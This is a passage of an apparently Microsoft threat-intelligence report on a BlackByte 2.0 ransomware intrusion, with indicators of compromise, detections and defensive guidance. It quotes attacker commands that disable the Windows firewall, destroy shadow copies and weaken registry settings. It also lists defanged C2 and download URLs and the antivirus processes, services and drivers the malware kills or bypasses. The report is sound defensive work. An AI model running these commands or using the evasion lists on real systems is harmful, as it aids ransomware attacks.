channel:\n\n * 109.206.243[.]59:443\n\n**AnyDesk******\n\nThreat actors leverage legitimate remote access tools during intrusions to blend into a victim network. In this case, the threat actor utilized the remote administration tool AnyDesk, to maintain persistence and move laterally within the network. AnyDesk was installed as a service and was run from the following paths:\n\n * _C:\\systemtest\\anydesk\\AnyDesk.exe_\n * _C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe_\n * _C:\\Scripts\\AnyDesk.exe_\n\nSuccessful connections were observed in the AnyDesk log file _ad_svc.trace_ involving anonymizer service IP addresses linked to TOR and MULLVAD VPN, a common technique that threat actors employ to obscure their source IP ranges.\n\n### Reconnaissance\n\nWe found the presence and execution of the network discovery tool NetScan being used by the threat actor to perform network enumeration using the following file names:\n\n * _netscan.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n * _netapp.exe _(SHA-256:1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e)\n\nAdditionally, execution of AdFind (SHA-256: f157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e), an Active Directory reconnaissance tool, was observed in the environment.\n\n### Credential access\n\nEvidence of likely usage of the credential theft tool Mimikatzwas also uncovered through the presence of a related log file _mimikatz.log_. Microsoft IR assesses that Mimikatz was likely used to attain credentials for privileged accounts.\n\n### Lateral movement\n\nUsing compromised domain admin credentials, the threat actor used Remote Desktop Protocol (RDP) and PowerShell remoting to obtain access to other servers in the environment, including domain controllers.\n\n### Data staging and exfiltration\n\nIn one server where Microsoft Defender Antivirus was installed, a suspicious file named _explorer.exe_ was identified, detected as Trojan:Win64/WinGoObfusc.LK!MT, and quarantined. However, because tamper protection wasn\u2019t enabled on this server, the threat actor was able to disable the Microsoft Defender Antivirus service, enabling the threat actor to run the file using the following command:\n\nexplorer.exe P@$$w0rd\n\nAfter reverse engineering_ explorer.exe_, we determined it to be ExByte, a GoLang-based tool developed and commonly used in BlackByte ransomware attacks for collection and exfiltration of files from victim networks. This tool is capable of enumerating files of interest across the network and, upon execution, creates a log file containing a list of files and associated metadata. Multiple log files were uncovered during the investigation in the path:\n\n * _C:\\Exchange\\MSExchLog.log_\n\nAnalysis of the binary revealed a list of file extensions that are targeted for enumeration.\n\n![Figure-2.-Binary-analysis-showing-file-extensions-enumerated-by-explorer.exe_](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/Figure-2.-Binary-analysis-showing-file-extensions-enumerated-by-explorer.exe_.jpg)Figure 2. Binary analysis showing file extensions enumerated by _explorer.exe_\n\nForensic analysis identified a file named _data.txt_ that was created and later deleted after ExByte execution. This file contained obfuscated credentials that ExByte leveraged to authenticate to the popular file sharing platform Mega NZ using the platform\u2019s API at:\n\n * _hxxps://g.api.mega.co[.]nz_\n![](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2023/07/Figure-3.-Binary-analysis-showing-explorer.exe-functionality-for-connecting-to-file-sharing-service-MEGA-NZ.webp)Figure 3. Binary analysis showing explorer.exe functionality for connecting to file sharing service MEGA NZ\n\nWe also determined that this version of Exbyte was crafted specifically for the victim, as it contained a hardcoded device name belonging to the victim and an internal IP address.\n\n**ExByte execution flow**\n\nUpon execution, ExByte decodes several strings and checks if the process is running with privileged access by reading _\\\\\\\\.\\PHYSICALDRIVE0_:\n\n * If this check fails, _ShellExecuteW_ is invoked with the _IpOperation_ parameter _RunAs_, which runs _explorer.exe_ with elevated privileges.\n\nAfter this access check, _explorer.exe_ attempts to read the _data.txt_ file in the current location:\n\n * If the text file doesn\u2019t exist, it invokes a command for self-deletion and exits from memory:\n \n \n C:\\Windows\\system32\\cmd.exe /c ping 1.1.1.1 -n 10 > nul & Del <PATH>\\explorer.exe /F /Q\n \n\n * If _data.txt_ exists, _explorer.exe_ reads the file, passes the buffer to Base64 decode function, and then decrypts the data using the key provided in the command line. The decrypted data is then parsed as JSON below and fed for login function:\n \n \n {\n \t\u201ca\u201d:\u201dus0\u201d,\n \t\u201cuser\u201d:\u201d<CONTENT FROM data.txt>\u201d\n }\n \n\nFinally, it forms a URL for sign-in to the API of the service MEGA NZ:\n\n * _hxxps://g.api.mega.co[.]nz/cs?id=1674017543_\n\n### Data encryption and destruction\n\nOn devices where files were successfully encrypted, we identified suspicious executables, detected by Microsoft Defender Antivirus as Trojan:Win64/BlackByte!MSR, with the following names:\n\n * _wEFT.exe_\n * _schillerized.exe_\n\nThe files were analyzed and determined to be BlackByte 2.0 binaries responsible for encryption across the environment. The binaries require an 8-digit key number to encrypt files.\n\nTwo modes of execution were identified:\n\n * When the _-s_ parameter is provided, the ransomware self-deletes and encrypts the machine it was executed on.\n * When the _-a_ parameter is provided, the ransomware conducts enumeration and uses an Ultimate Packer Executable (UPX) packed version of PsExec to deploy across the network. Several domain admin credentials were hardcoded in the binary, facilitating the deployment of the binary across the network.\n\nDepending on the switch (_-s_ or _-a_), execution may create the following files:\n\n * _C:\\SystemData\\M8yl89s7.exe_ (UPX-packed PsExec with a random name; SHA-256: ba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f)\n * _C:\\SystemData\\wEFT.exe_ (Additional BlackByte binary)\n * _C:\\SystemData\\MsExchangeLog1.log_ (Log file)\n * _C:\\SystemData\\rENEgOtiAtES _(A vulnerable (CVE-2019-16098) driver _RtCore64.sys_ used to evade detection by installed antivirus software; SHA-256: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)\n * _C:\\SystemData\\iHu6c4.ico_ (Random name \u2013 BlackBytes icon)\n * _C:\\SystemData\\BB_Readme_file.txt_ (BlackByte ReadMe file)\n * _C:\\SystemData\\skip_bypass.txt_ (Unknown)\n\n**BlackByte 2.0 ransomware capabilities**\n\nSome capabilities identified for the BlackByte 2.0 ransomware were:\n\n * Antivirus bypass\n * The file _rENEgOtiAtES_ created matches _RTCore64.sys_, a vulnerable driver (CVE-2049-16098) that allows any authenticated user to read or write to arbitrary memory\n * The BlackByte binary then creates and starts a service named _RABAsSaa_ calling _rENEgOtiAtES_, and exploits this service to evade detection by installed antivirus software\n * Process hollowing \n * Invokes _svchost.exe_, injects to it to complete device encryption, and self-deletes by executing the following command: \n * `cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del \u201cPATH_TO_BLACKBYTE\u201d /F /Q`\n * Modification / disabling of Windows Firewall \n * The following commands are executed to either modify existing Windows Firewall rules, or to disable Windows Firewall entirely:\n * `cmd /c netsh advfirewall set allprofiles state off`\n * * `cmd /c netsh advfirewall firewall set rule group=\u201dFile and Printer Sharing\u201d new enable=Yes`\n * `cmd /c netsh advfirewall firewall set rule group=\u201dNetwork Discovery\u201d new enable=Yes`\n * Modification of volume shadow copies \n * The following commands are executed to destroy volume shadow copies on the machine:\n * `cmd /c vssadmin Resize ShadowStorge /For=B:\\ /On=B:\\ /MaxSize=401MB`\n * `cmd /c vssadmin Resize ShadowStorage /For=B:\\ /On=B:\\ /MaxSize=UNBOUNDED`\n * Modification of registry keys/values \n * The following commands are executed to modify the registry, facilitating elevated execution on the device:\n * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`\n * * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f`\n * `cmd /c reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f`\n * Additional functionality\n * Ability to terminate running services and processes\n * Ability to enumerate and mount volumes and network shares for encryption\n * Perform anti-forensics technique timestomping (sets the file time of encrypted and ReadMe file to 2000-01-01 00:00:00)\n * Ability to perform anti-debugging techniques\n\n## Recommendations\n\nTo guard against BlackByte ransomware attacks, Microsoft recommends the following:\n\n * Ensure that you have a patch management process in place and that patching for internet-exposed devices is prioritized; Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools like [Microsoft Defender Vulnerability Management**_ _**](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide>)**__**\n * Implement an endpoint detection and response (EDR) solution like [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) to gain visibility into malicious activity in real time across your network\n * Ensure antivirus protections are updated regularly by [turning on cloud-based protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) and that your antivirus solution is configured to block threats\n * Enable [tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) to prevent components of Microsoft Defender Antivirus from being disabled\n * Block inbound traffic from IPs specified in the indicators of compromise section of this report\n * Block inbound traffic from TOR exit nodes\n * Block inbound access from unauthorized public VPN services\n * Restrict administrative privileges to prevent authorized system changes\n\n## Conclusion\n\nBlackByte ransomware attacks target organizations that have infrastructure with unpatched vulnerabilities. As outlined in the [Microsoft Digital Defense Report](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>), common security hygiene practices, including keeping systems up to date, could protect against 98% of attacks.\n\nAs new tools are being developed by threat actors, a modern threat protection solution like Microsoft 365 Defender is necessary to prevent and detect the multiple techniques used in the attack chain, especially where the threat actor attempts to evade or disable specific defense mechanisms. Hunting for malicious behavior should be performed regularly in order to detect potential attacks that could evade detections, as a complementary activity for continuous monitoring from security tools alerts and incidents.\n\nTo understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/MicrosoftIR.\n\n## Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects this threat as the following malware:\n\n * Trojan:Win32/Kovter!MSR\n * Trojan:Win64/WinGoObfusc.LK!MT\n * Trojan:Win64/BlackByte!MSR\n * HackTool:Win32/AdFind!MSR\n * Trojan:Win64/CobaltStrike!MSR\n\n**Microsoft Defender for Endpoint**\n\nThe following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * 'CVE-2021-31207' exploit malware was detected\n * An active 'NetShDisableFireWall' malware in a command line was prevented from executing.\n * Suspicious registry modification.\n * \u2018Rtcore64\u2019 hacktool was detected\n * Possible ongoing hands-on-keyboard activity (Cobalt Strike)\n * A file or network connection related to a ransomware-linked emerging threat activity group detected\n * Suspicious sequence of exploration activities\n * A process was injected with potentially malicious code\n * Suspicious behavior by cmd.exe was observed\n * 'Blackbyte' ransomware was detected\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-34473\n * CVE-2021-34523\n * CVE-2021-31207\n * CVE-2019-16098\n\n## Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\n**ProxyShell web shell creation events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"ExcludeDumpster\",\"New-ExchangeCertificate\") and ProcessCommandLine has_any (\"-RequestFile\",\"-FilePath\")\n \n\n**Suspicious vssadmin events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"vssadmin\",\"vssadmin.exe\") and ProcessCommandLine has \"Resize ShadowStorage\" and ProcessCommandLine has_any (\"MaxSize=401MB\",\" MaxSize=UNBOUNDED\")\n \n\n**Detection for persistence creation using Registry Run keys**\n \n \n DeviceRegistryEvents \n | where ActionType == \"RegistryValueSet\" \n | where (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnce\" and RegistryValueName == \"MsEdgeMsE\") \n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnceEx\" and RegistryValueName == \"MsEdgeMsE\")\n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\Run\" and RegistryValueName == \"MsEdgeMsE\")\n | where RegistryValueData startswith @\"rundll32\"\n | where RegistryValueData endswith @\".dll,Default\"\n | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData\n \n\n**Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>)\n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web%20Shells%20Threat%20Protection/Hunting%20Queries/WebShellActivity.yaml>)\n * [Suspicious file downloads on Exchange Servers](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>)\n * [Firewall rule changes](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/MultipleDataSources/FirewallRuleChanges_using_netsh.yaml>)\n * [Shadow copy deletion](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/ShadowCopyDeletion.yml>)\n * [Anamolous RDP activity](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Solutions/UEBA%20Essentials/Hunting%20Queries/Anomalous%20RDP%20Activity.yaml>)\n\n## Indicators of compromise\n\nThe table below shows IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\nIndicator| Type| Description \n---|---|--- \n4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e| SHA-256| api-msvc.dll (Backdoor installed through RunKeys) \n5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103| SHA-256| sys.exe (Cobalt Strike Beacon) \n01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd| SHA-256| rENEgOtiAtES (Vulnerable driver RtCore64.sys created by BlackByte binary) \nba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f| SHA-256| [RANDOM_NAME].exe (UPX Packed PsExec created by BlackByte binary) \n1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e| SHA-256| \u201cnetscan.exe\u201d, \u201cnetapp.exe (Netscan network discovery tool) \nf157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e| SHA-256| AdFind.exe (Active Directory information gathering tool) \nhxxps://myvisit[.]alteksecurity[.]org/t| URL| C2 for backdoor api-msvc.dll \nhxxps://temp[.]sh/szAyn/sys.exe| URL| Download URL for sys.exe \n109.206.243[.]59| IP Address| C2 for Cobalt Strike Beacon sys.exe \n185.225.73[.]244| IP Address| Originating IP address for ProxyShell exploitation and web shell interaction \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Appendix\n\nFile extensions targeted by BlackByte binary for encryption:\n\n.4dd| .4dl| .accdb| .accdc| .accde| .accdr| .accdt| .accft \n---|---|---|---|---|---|---|--- \n.adb| .ade| .adf| .adp| .arc| .ora| .alf| .ask \n.btr| .bdf| .cat| .cdb| .ckp| .cma| .cpd| .dacpac \n.dad| .dadiagrams| .daschema| .db| .db-shm| .db-wal| .db3| .dbc \n.dbf| .dbs| .dbt| .dbv| . dbx| . dcb| . dct| . dcx \n. ddl| . dlis| . dp1| . dqy| . dsk| . dsn| . dtsx| . dxl \n. eco| . ecx| . edb| . epim| . exb| . fcd| . fdb| . fic \n. fmp| . fmp12| . fmpsl| . fol| .fp3| . fp4| . fp5| . fp7 \n. fpt| . frm| . gdb| . grdb| . gwi| . hdb| . his| . ib \n. idb| . ihx| . itdb| . itw| . jet| . jtx| . kdb| . kexi \n. kexic| . kexis| . lgc| . lwx| . maf| . maq| . mar| . masmav \n. mdb| . mpd| . mrg| . mud| . mwb| . myd| . ndf| . nnt \n. nrmlib| . ns2| . ns3| . ns4| . nsf| . nv| . nv2| . nwdb \n. nyf| . odb| . ogy| . orx| . owc| . p96| . p97| . pan \n. pdb| . pdm| . pnz| . qry| . qvd| . rbf| . rctd| . rod \n. rodx| . rpd| . rsd| . sas7bdat| . sbf| . scx| . sdb| . sdc \n. sdf| . sis| . spg| . sql| . sqlite| . sqlite3| . sqlitedb| . te \n. temx| . tmd| . tps| . trc| . trm| . udb| . udl| . usr \n. v12| . vis| . vpd| . vvv| . wdb| . wmdb| . wrk| . xdb \n. xld| . xmlff| . abcddb| . abs| . abx| . accdw| . and| . db2 \n. fm5| . hjt| . icg| . icr| . kdb| . lut| . maw| . mdn \n. mdt| | | | | | | \n \nShared folders targeted for encryption (Example: _\\\\\\\\[IP address]\\Downloads_):\n\nUsers| Backup| Veeam| homes| home \n---|---|---|---|--- \nmedia| common| Storage Server| Public| Web \nImages| Downloads| BackupData| ActiveBackupForBusiness| Backups \nNAS-DC| DCBACKUP| DirectorFiles| share| \n \nFile extensions ignored:\n\n.ini| .url| .msilog| .log| .ldf| .lock| .theme| .msi \n---|---|---|---|---|---|---|--- \n.sys| .wpx| .cpl| .adv| .msc| .scr| .key| .ico \n.dll| .hta| .deskthemepack| .nomedia| .msu| .rtp| .msp| .idx \n.ani| .386| .diagcfg| .bin| .mod| .ics| .com| .hlp \n .spl| .nls| .cab| .exe| .diagpkg| .icl| .ocx| .rom \n.prf| .thempack| .msstyles| .icns| .mpa| .drv| .cur| .diagcab \n.cmd| .shs| | | | | | \n \nFolders ignored:\n\nwindows| boot| program files (x86)| windows.old| programdata \n---|---|---|---|--- \nintel| bitdefender| trend micro| windowsapps| appdata \napplication data| system volume information| perflogs| msocache| \n \nFiles ignored:\n\nbootnxt| ntldr| bootmgr| thumbs.db \n---|---|---|--- \nntuser.dat| bootsect.bak| autoexec.bat| iconcache.db \nbootfont.bin| | | \n \nProcesses terminated:\n\nteracopy| teamviewer| nsservice| nsctrl| uranium \n---|---|---|---|--- \nprocesshacker| procmon| pestudio| procmon64| x32dbg \nx64dbg| cff explorer| procexp| pslist| tcpview \ntcpvcon| dbgview| rammap| rammap64| vmmap \nollydbg| autoruns| autorunssc| filemon| regmon \nidaq| idaq64| immunitydebugger| wireshark| dumpcap \nhookexplorer| importrec| petools| lordpe| sysinspector \nproc_analyzer| sysanalyzer| sniff_hit| windbg| joeboxcontrol \njoeboxserver| resourcehacker| fiddler| httpdebugger| dumpit \nrammap| rammap64| vmmap| agntsvc| cntaosmgr \ndbeng50| dbsnmp| encsvc| infopath| isqlplussvc \nmbamtray| msaccess| msftesql| mspub| mydesktopqos \nmydesktopservice| mysqld| mysqld-nt| mysqld-opt| Ntrtscan \nocautoupds| ocomm| ocssd| onenote| oracle \noutlook| PccNTMon| powerpnt| sqbcoreservice| sql \nsqlagent| sqlbrowser| sqlservr| sqlwriter| steam \nsynctime| tbirdconfig| thebat| thebat64| thunderbird \ntmlisten| visio| winword| wordpad| xfssvccon \nzoolz| | | | \n \nServices terminated:\n\nCybereasonRansomFree| vnetd| bpcd| SamSs| TeraCopyService \n---|---|---|---|--- \nmsftesql| nsService| klvssbridge64| vapiendpoint| ShMonitor \nSmcinst| SmcService| SntpService| svcGenericHost| Swi_ \nTmCCSF| tmlisten| TrueKey| TrueKeyScheduler| TrueKeyServiceHelper \nWRSVC| McTaskManager| OracleClientCache80| mfefire| wbengine \nmfemms| RESvc| mfevtp| sacsvr| SAVAdminService \nSepMasterService| PDVFSService| ESHASRV| SDRSVC| FA_Scheduler \nKAVFS| KAVFS_KAVFSGT| kavfsslp| klnagent| macmnsvc \nmasvc| MBAMService| MBEndpointAgent| McShield| audioendpointbuilder \nAntivirus| AVP| DCAgent| bedbg| EhttpSrv \nMMS| ekrn| EPSecurityService| EPUpdateService| ntrtscan \nEsgShKernel| msexchangeadtopology| AcrSch2Svc| MSOLAP$TPSAMA| Intel(R) PROSet Monitoring \nmsexchangeimap4| ARSM| unistoresvc_1af40a| ReportServer$TPS| MSOLAP$SYSTEM_BGC \nW3Svc| MSExchangeSRS| ReportServer$TPSAMA| Zoolz 2 Service| MSOLAP$TPS \naphidmonitorservice| SstpSvc| MSExchangeMTA| ReportServer$SYSTEM_BGC| Symantec System Recovery \nUI0Detect| MSExchangeSA| MSExchangeIS| ReportServer| MsDtsServer110 \nPOP3Svc| MSExchangeMGMT| SMTPSvc| MsDtsServer| IisAdmin \nMSExchangeES| EraserSvc11710| Enterprise Client Service| MsDtsServer100| NetMsmqActivator \nstc_raw_agent| VSNAPVSS| PDVFSService| AcrSch2Svc| Acronis \nCASAD2DWebSvc| CAARCUpdateSvc| McAfee| avpsus| DLPAgentService \nmfewc| BMR Boot Service| DefWatch| ccEvtMgr| ccSetMgr \nSavRoam| RTVsc screenconnect| ransom| sqltelemetry| msexch \nvnc| teamviewer| msolap| veeam| backup \nsql| memtas| vss| sophos| svc$ \nmepocs| wuauserv| | | \n \nDrivers that Blackbyte can bypass:\n\n360avflt.sys| 360box.sys| 360fsflt.sys| 360qpesv.sys| 5nine.cbt.sys \n---|---|---|---|--- \na2acc.sys| a2acc64.sys| a2ertpx64.sys| a2ertpx86.sys| a2gffi64.sys \na2gffx64.sys| a2gffx86.sys| aaf.sys| aalprotect.sys| abrpmon.sys \naccessvalidator.sys| acdriver.sys| acdrv.sys| adaptivaclientcache32.sys| adaptivaclientcache64.sys \nadcvcsnt.sys| adspiderdoc.sys| aefilter.sys| agentrtm64.sys| agfsmon.sys \nagseclock.sys| agsyslock.sys| ahkamflt.sys| ahksvpro.sys| ahkusbfw.sys \nahnrghlh.sys| aictracedrv_am.sys| airship-filter.sys| ajfsprot.sys| alcapture.sys \nalfaff.sys| altcbt.sys| amfd.sys| amfsm.sys| amm6460.sys \namm8660.sys| amsfilter.sys| amznmon.sys| antileakfilter.sys| antispyfilter.sys \nanvfsm.sys| apexsqlfilterdriver.sys| appcheckd.sys| appguard.sys| appvmon.sys \narfmonnt.sys| arta.sys| arwflt.sys| asgard.sys| ashavscan.sys \nasiofms.sys| aswfsblk.sys| aswmonflt.sys| aswsnx.sys| aswsp.sys \naszfltnt.sys| atamptnt.sys| atc.sys| atdragent.sys| atdragent64.sys \naternityregistryhook.sys| atflt.sys| atrsdfw.sys| auditflt.sys| aupdrv.sys \navapsfd.sys| avc3.sys| avckf.sys| avfsmn.sys| avgmfi64.sys \navgmfrs.sys| avgmfx64.sys| avgmfx86.sys| avgntflt.sys| avgtpx64.sys \navgtpx86.sys| avipbb.sys| avkmgr.sys| avmf.sys| awarecore.sys \naxfltdrv.sys| axfsysmon.sys| ayfilter.sys| b9kernel.sys| backupreader.sys \nbamfltr.sys| bapfecpt.sys| bbfilter.sys| bd0003.sys| bddevflt.sys \nbdfiledefend.sys| bdfilespy.sys| bdfm.sys| bdfsfltr.sys| bdprivmon.sys \nbdrdfolder.sys| bdsdkit.sys| bdsfilter.sys| bdsflt.sys| bdsvm.sys \nbdsysmon.sys| bedaisy.sys| bemk.sys| bfaccess.sys| bfilter.sys \nbfmon.sys| bhdrvx64.sys| bhdrvx86.sys| bhkavka.sys| bhkavki.sys \nbkavautoflt.sys| bkavsdflt.sys| blackbirdfsa.sys| blackcat.sys| bmfsdrv.sys \nbmregdrv.sys| boscmflt.sys| bosfsfltr.sys| bouncer.sys| boxifier.sys \nbrcow_x_x_x_x.sys| brfilter.sys| brnfilelock.sys| brnseclock.sys| browsermon.sys \nbsrfsflt.sys| bssaudit.sys| bsyaed.sys| bsyar.sys| bsydf.sys \nbsyirmf.sys| bsyrtm.sys| bsysp.sys| bsywl.sys| bwfsdrv.sys \nbzsenspdrv.sys| bzsenth.sys| bzsenyaradrv.sys| caadflt.sys| caavfltr.sys \ncancelsafe.sys| carbonblackk.sys| catflt.sys| catmf.sys| cbelam.sys \ncbfilter20.sys| cbfltfs4.sys| cbfsfilter2017.sys| cbfsfilter2020.sys| cbsampledrv.sys \ncdo.sys| cdrrsflt.sys| cdsgfsfilter.sys| centrifyfsf.sys| cfrmd.sys \ncfsfdrv| cgwmf.sys| change.sys| changelog.sys| chemometecfilter.sys \nciscoampcefwdriver.sys| ciscoampheurdriver.sys| ciscosam.sys| clumiochangeblockmf.sys| cmdccav.sys \ncmdcwagt.sys| cmdguard.sys| cmdmnefs.sys| cmflt.sys| code42filter.sys \ncodex.sys| conduantfsfltr.sys| containermonitor.sys| cpavfilter.sys| cpavkernel.sys \ncpepmon.sys| crexecprev.sys| crncache32.sys| crncache64.sys| crnsysm.sys \ncruncopy.sys| csaam.sys| csaav.sys| csacentr.sys| csaenh.sys \ncsagent.sys| csareg.sys| csascr.sys| csbfilter.sys| csdevicecontrol.sys \ncsfirmwareanalysis.sys| csflt.sys| csmon.sys| cssdlp.sys| ctamflt.sys \nctifile.sys| ctinet.sys| ctrpamon.sys| ctx.sys| cvcbt.sys \ncvofflineflt32.sys| cvofflineflt64.sys| cvsflt.sys| cwdriver.sys| cwmem2k64.sys \ncybkerneltracker.sys| cylancedrv64.sys| cyoptics.sys| cyprotectdrv32.sys| cyprotectdrv64.sys \ncytmon.sys| cyverak.sys| cyvrfsfd.sys| cyvrlpc.sys| cyvrmtgn.sys \ndatanow_driver.sys| dattofsf.sys| da_ctl.sys| dcfafilter.sys| dcfsgrd.sys \ndcsnaprestore.sys| deepinsfs.sys| delete_flt.sys| devmonminifilter.sys| dfmfilter.sys \ndgedriver.sys| dgfilter.sys| dgsafe.sys| dhwatchdog.sys| diflt.sys \ndiskactmon.sys| dkdrv.sys| dkrtwrt.sys| dktlfsmf.sys| dnafsmonitor.sys \ndocvmonk.sys| docvmonk64.sys| dpmfilter.sys| drbdlock.sys| drivesentryfilterdriver2lite.sys \ndrsfile.sys| drvhookcsmf.sys| drvhookcsmf_amd64.sys| drwebfwflt.sys| drwebfwft.sys \ndsark.sys| dsdriver.sys| dsfemon.sys| dsflt.sys| dsfltfs.sys \ndskmn.sys| dtdsel.sys| dtpl.sys| dwprot.sys| dwshield.sys \ndwshield64.sys| eamonm.sys| easeflt.sys| easyanticheat.sys| eaw.sys \necatdriver.sys| edevmon.sys| ednemfsfilter.sys| edrdrv.sys| edrsensor.sys \nedsigk.sys| eectrl.sys| eetd32.sys| eetd64.sys| eeyehv.sys \neeyehv64.sys| egambit.sys| egfilterk.sys| egminflt.sys| egnfsflt.sys \nehdrv.sys| elock2fsctldriver.sys| emxdrv2.sys| enigmafilemondriver.sys| enmon.sys \nepdrv.sys| epfw.sys| epfwwfp.sys| epicfilter.sys| epklib.sys \nepp64.sys| epregflt.sys| eps.sys| epsmn.sys| equ8_helper.sys \neraser.sys| esensor.sys| esprobe.sys| estprmon.sys| estprp.sys \nestregmon.sys| estregp.sys| estrkmon.sys| estrkr.sys| eventmon.sys \nevmf.sys| evscase.sys| excfs.sys| exprevdriver.sys| failattach.sys \nfailmount.sys| fam.sys| fangcloud_autolock_driver.sys| fapmonitor.sys| farflt.sys \nfarwflt.sys| fasdriver| fcnotify.sys| fcontrol.sys| fdrtrace.sys \nfekern.sys| fencry.sys| ffcfilt.sys| ffdriver.sys| fildds.sys \nfilefilter.sys| fileflt.sys| fileguard.sys| filehubagent.sys| filemon.sys \nfilemonitor.sys| filenamevalidator.sys| filescan.sys| filesharemon.sys| filesightmf.sys \nfilesystemcbt.sys| filetrace.sys| file_monitor.sys| file_protector.sys| file_tracker.sys \nfilrdriver.sys| fim.sys| fiometer.sys| fiopolicyfilter.sys| fjgsdis2.sys \nfjseparettifilterredirect.sys| flashaccelfs.sys| flightrecorder.sys| fltrs329.sys| flyfs.sys \nfmdrive.sys| fmkkc.sys| fmm.sys| fortiaptfilter.sys| fortimon2.sys \nfortirmon.sys| fortishield.sys| fpav_rtp.sys| fpepflt.sys| fsafilter.sys \nfsatp.sys| fsfilter.sys| fsgk.sys| fshs.sys| fsmon.sys \nfsmonitor.sys| fsnk.sys| fsrfilter.sys| fstrace.sys| fsulgk.sys \nfsw31rj1.sys| gagsecurity.sys| gbpkm.sys| gcffilter.sys| gddcv.sys \ngefcmp.sys| gemma.sys| geprotection.sys| ggc.sys| gibepcore.sys \ngkff.sys| gkff64.sys| gkpfcb.sys| gkpfcb64.sys| gofsmf.sys \ngpminifilter.sys| groundling32.sys| groundling64.sys| gtkdrv.sys| gumhfilter.sys \ngzflt.sys| hafsnk.sys| hbflt.sys| hbfsfltr.sys| hcp_kernel_acq.sys \nhdcorrelatefdrv.sys| hdfilemon.sys| hdransomoffdrv.sys| hdrfs.sys| heimdall.sys \nhexisfsmonitor.sys| hfileflt.sys| hiofs.sys| hmpalert.sys| hookcentre.sys \nhooksys.sys| hpreg.sys| hsmltmon.sys| hsmltwhl.sys| hssfwhl.sys \nhvlminifilter.sys| ibr2fsk.sys| iccfileioad.sys| iccfilteraudit.sys| iccfiltersc.sys \nicfclientflt.sys| icrlmonitor.sys| iderafilterdriver.sys| ielcp.sys| ieslp.sys \nifs64.sys| ignis.sys| iguard.sys| iiscache.sys| ikfilesec.sys \nim.sys| imffilter.sys| imfilter.sys| imgguard.sys| immflex.sys \nimmunetprotect.sys| immunetselfprotect.sys| 